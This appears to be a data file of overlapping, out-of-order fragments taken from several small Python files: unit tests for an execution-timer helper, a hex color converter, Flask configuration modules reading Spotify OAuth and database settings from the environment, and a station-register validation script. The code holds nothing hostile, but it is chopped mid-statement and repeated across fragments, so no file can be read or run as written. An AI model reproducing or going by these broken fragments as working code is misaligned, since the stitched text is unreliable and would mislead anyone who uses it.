"1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) if __name__ == \"__main__\": unittest.main()",
"utf-8 -*- import unittest from time import sleep import numpy as np from",
"numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self):",
"func(a): # pylint: disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func =",
"np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\":",
"np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times",
"func = test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]),",
"bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def func(a): # pylint: disable=unused-argument sleep(n) return func",
"2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1)",
"func = test_func_factory(1) numbers, times = execution_timer(func, lambda x: x, options={\"minimum_n\": 1, \"maximum_n\":",
"time import sleep import numpy as np from bigo_test.assertions.helpers import execution_timer def test_func_factory(n):",
"1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func",
"test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1,",
"= test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1)",
"unittest from time import sleep import numpy as np from bigo_test.assertions.helpers import execution_timer",
"2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) if __name__ ==",
"def func(a): # pylint: disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func",
"1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times =",
"numbers, times = execution_timer(func, lambda x: x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2})",
"np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers,",
"test_func_factory(n): def func(a): # pylint: disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase): def test_execution_timer(self):",
"def test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times,",
"\"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self):",
"-*- coding: utf-8 -*- import unittest from time import sleep import numpy as",
"import sleep import numpy as np from bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def",
"1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\": 2,",
"1]), decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1,",
"decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1]))",
"execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1)",
"test_execution_timer(self): func = test_func_factory(1) numbers, times = execution_timer(func, lambda x: x, options={\"minimum_n\": 1,",
"<reponame>nvn-nil/bigo_test # -*- coding: utf-8 -*- import unittest from time import sleep import",
"return func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1) numbers, times = execution_timer(func,",
"test_func_factory(1) numbers, times = execution_timer(func, lambda x: x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\":",
"def test_func_factory(n): def func(a): # pylint: disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase): def",
"= test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2]))",
"# pylint: disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1)",
"sleep(n) return func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1) numbers, times =",
"test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def",
"sleep import numpy as np from bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def func(a):",
"disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1) numbers, times"
] |
[
"(int(code[i*2+1:i*2+3],16) for i in range(3)) return (color, {'r': r, 'g': g, 'b': b})",
"for i in range(3)) return (color, {'r': r, 'g': g, 'b': b}) d",
"in range(3)) return (color, {'r': r, 'g': g, 'b': b}) d = dict(to_color(code,color)",
"return (color, {'r': r, 'g': g, 'b': b}) d = dict(to_color(code,color) for code,",
"config import COLORS def to_color(code, color): r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3))",
"import COLORS def to_color(code, color): r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3)) return",
"color): r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3)) return (color, {'r': r, 'g':",
"r, 'g': g, 'b': b}) d = dict(to_color(code,color) for code, color in COLORS)",
"COLORS def to_color(code, color): r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3)) return (color,",
"range(3)) return (color, {'r': r, 'g': g, 'b': b}) d = dict(to_color(code,color) for",
"'g': g, 'b': b}) d = dict(to_color(code,color) for code, color in COLORS) import",
"= (int(code[i*2+1:i*2+3],16) for i in range(3)) return (color, {'r': r, 'g': g, 'b':",
"from config import COLORS def to_color(code, color): r,g,b = (int(code[i*2+1:i*2+3],16) for i in",
"{'r': r, 'g': g, 'b': b}) d = dict(to_color(code,color) for code, color in",
"'b': b}) d = dict(to_color(code,color) for code, color in COLORS) import json print(json.dumps(d,ensure_ascii=False))",
"g, 'b': b}) d = dict(to_color(code,color) for code, color in COLORS) import json",
"<gh_stars>0 from config import COLORS def to_color(code, color): r,g,b = (int(code[i*2+1:i*2+3],16) for i",
"def to_color(code, color): r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3)) return (color, {'r':",
"(color, {'r': r, 'g': g, 'b': b}) d = dict(to_color(code,color) for code, color",
"to_color(code, color): r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3)) return (color, {'r': r,",
"r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3)) return (color, {'r': r, 'g': g,",
"i in range(3)) return (color, {'r': r, 'g': g, 'b': b}) d ="
] |
[
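The slice code[i*2+1:i*2+3] skips a leading character, so COLORS evidently holds ('#rrggbb', name) pairs. A quick sanity check of the channel math, using a made-up entry:

# hypothetical input, for illustration only
print(to_color('#ff8000', 'orange'))
# -> ('orange', {'r': 255, 'g': 128, 'b': 0})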
"True CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\")",
"CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL = environ.get(\"CALLBACK_URL\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL\")",
"dotenv import load_dotenv from os import environ, path from pathlib import Path load_dotenv(verbose=True)",
"= environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL = environ.get(\"CALLBACK_URL\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL\") SQLALCHEMY_TRACK_MODIFICATIONS",
"SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if",
"path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID",
"dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True SECRET_KEY =",
"environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL",
"SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING",
"environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\")",
"SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL = environ.get(\"CALLBACK_URL\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL\") SQLALCHEMY_TRACK_MODIFICATIONS = True",
"CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET",
"import load_dotenv from os import environ, path from pathlib import Path load_dotenv(verbose=True) parent_path",
"= environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG =",
"environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL = environ.get(\"CALLBACK_URL\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL\") SQLALCHEMY_TRACK_MODIFICATIONS =",
"load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\")",
"or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL = environ.get(\"CALLBACK_URL\") SQLALCHEMY_DATABASE_URI",
"\".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID =",
"if FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL =",
"= True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET =",
"environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\")",
"FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL = environ.get(\"CALLBACK_URL\")",
"environ, path from pathlib import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path = path.join(parent_path,",
"path from pathlib import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path = path.join(parent_path, \".env\")",
"from dotenv import load_dotenv from os import environ, path from pathlib import Path",
"environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI =",
"Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True SECRET_KEY",
"TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL = environ.get(\"CALLBACK_URL\") SQLALCHEMY_DATABASE_URI =",
"environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL =",
"os import environ, path from pathlib import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path",
"parent_path = Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY =",
"= environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI",
"= Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True",
"from os import environ, path from pathlib import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent",
"SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG",
"= environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG",
"True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\")",
"import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE =",
"FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\")",
"CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET",
"from pathlib import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path)",
"CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or TESTING:",
"= environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else:",
"load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY",
"environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or",
"= path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\")",
"Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True",
"= True CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET =",
"= environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL",
"load_dotenv from os import environ, path from pathlib import Path load_dotenv(verbose=True) parent_path =",
"= environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING =",
"TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\")",
"pathlib import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE",
"import environ, path from pathlib import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path ="
] |
[
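One caveat worth noting: environ.get() returns strings, so any non-empty value, including "0" or "False", makes the FLASK_DEBUG or TESTING branch truthy and selects the dev database. A stricter parse might look like this (a suggestion, not in the original):

FLASK_DEBUG = environ.get("FLASK_DEBUG", "").lower() in ("1", "true", "yes")
TESTING = environ.get("TESTING", "").lower() in ("1", "true", "yes")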
"the configurations for different environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\" # Put any",
"configurations common across all environments SESSION_COOKIE_NAME = \"session\" TESTING = False class DevelopmentConfig(Config):",
"class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True # activates debug mode on app",
"config.py \"\"\" Module containing the configurations for different environments \"\"\" class Config(object): \"\"\"Common",
"configurations\"\"\" DEBUG = True # activates debug mode on app SQLALCHEMY_ECHO = True",
"= False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config = { 'development': 'DevelopmentConfig', 'production': 'ProductionConfig' }",
"TESTING = False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True # activates debug",
"# config.py \"\"\" Module containing the configurations for different environments \"\"\" class Config(object):",
"Config(object): \"\"\"Common configurations\"\"\" # Put any configurations common across all environments SESSION_COOKIE_NAME =",
"Put any configurations common across all environments SESSION_COOKIE_NAME = \"session\" TESTING = False",
"\"session\" TESTING = False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True # activates",
"\"\"\"Common configurations\"\"\" # Put any configurations common across all environments SESSION_COOKIE_NAME = \"session\"",
"# Put any configurations common across all environments SESSION_COOKIE_NAME = \"session\" TESTING =",
"debug mode on app SQLALCHEMY_ECHO = True # allows SQLAlchemy to log errors",
"\"\"\" class Config(object): \"\"\"Common configurations\"\"\" # Put any configurations common across all environments",
"True # allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy",
"to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to track changes while",
"configurations\"\"\" # Put any configurations common across all environments SESSION_COOKIE_NAME = \"session\" TESTING",
"all environments SESSION_COOKIE_NAME = \"session\" TESTING = False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG",
"True # activates debug mode on app SQLALCHEMY_ECHO = True # allows SQLAlchemy",
"app SQLALCHEMY_ECHO = True # allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True",
"environments SESSION_COOKIE_NAME = \"session\" TESTING = False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG =",
"across all environments SESSION_COOKIE_NAME = \"session\" TESTING = False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\"",
"DEBUG = True # activates debug mode on app SQLALCHEMY_ECHO = True #",
"SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to track changes while running class ProductionConfig(Config):",
"changes while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False",
"SESSION_COOKIE_NAME = \"session\" TESTING = False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True",
"allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to track",
"while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config",
"for different environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\" # Put any configurations common",
"log errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to track changes while running",
"# allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to",
"errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to track changes while running class",
"to track changes while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS",
"track changes while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS =",
"configurations for different environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\" # Put any configurations",
"# allows SQLAlchemy to track changes while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG",
"class Config(object): \"\"\"Common configurations\"\"\" # Put any configurations common across all environments SESSION_COOKIE_NAME",
"False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True # activates debug mode on",
"class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config = {",
"SQLAlchemy to track changes while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False",
"<reponame>Anonymous78/Registration-System<filename>config.py # config.py \"\"\" Module containing the configurations for different environments \"\"\" class",
"= True # activates debug mode on app SQLALCHEMY_ECHO = True # allows",
"Module containing the configurations for different environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\" #",
"= True # allows SQLAlchemy to track changes while running class ProductionConfig(Config): \"\"\"Production",
"SQLALCHEMY_ECHO = True # allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True #",
"running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config =",
"# activates debug mode on app SQLALCHEMY_ECHO = True # allows SQLAlchemy to",
"SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to track changes",
"different environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\" # Put any configurations common across",
"common across all environments SESSION_COOKIE_NAME = \"session\" TESTING = False class DevelopmentConfig(Config): \"\"\"Development",
"\"\"\" Module containing the configurations for different environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\"",
"DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True # activates debug mode on app SQLALCHEMY_ECHO",
"True # allows SQLAlchemy to track changes while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\"",
"mode on app SQLALCHEMY_ECHO = True # allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS",
"DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config = { 'development': 'DevelopmentConfig', 'production': 'ProductionConfig'",
"configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config = { 'development': 'DevelopmentConfig', 'production':",
"= \"session\" TESTING = False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True #",
"= False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True # activates debug mode",
"environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\" # Put any configurations common across all",
"allows SQLAlchemy to track changes while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG =",
"containing the configurations for different environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\" # Put",
"activates debug mode on app SQLALCHEMY_ECHO = True # allows SQLAlchemy to log",
"ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config = { 'development':",
"any configurations common across all environments SESSION_COOKIE_NAME = \"session\" TESTING = False class",
"\"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config = { 'development': 'DevelopmentConfig',",
"= True # allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows",
"on app SQLALCHEMY_ECHO = True # allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS =",
"\"\"\"Development configurations\"\"\" DEBUG = True # activates debug mode on app SQLALCHEMY_ECHO ="
] |
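For context, a minimal sketch of how the app_config mapping above might be consumed by a Flask application factory. The create_app function and the assumption that the file is importable as "config" are illustrative additions, not part of the original project.

from flask import Flask

from config import app_config  # assumes config.py sits on the import path


def create_app(config_name):
    """Build a Flask app configured for 'development' or 'production'."""
    app = Flask(__name__)
    # app_config maps short names to class names, so assemble the dotted
    # import path that Flask's config.from_object() accepts.
    app.config.from_object('config.{}'.format(app_config[config_name]))
    return app


app = create_app('development')
assert app.config['DEBUG'] is True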
[
"SMHI, Swedish Meteorological and Hydrological Institute # License: MIT License (see LICENSE.txt or",
"'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' )",
"# app.write_list( # writer='validation_log', # data=ValidatorLog.log # ) # # app.write_list( # writer='shark_master',",
"MIT License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37 @author: a002028",
"License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37 @author: a002028 \"\"\"",
"(see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37 @author: a002028 \"\"\" from",
"import ValidatorLog # app.write_list( # writer='validation_log', # data=ValidatorLog.log # ) # # app.write_list(",
"'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator",
"# app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import', )",
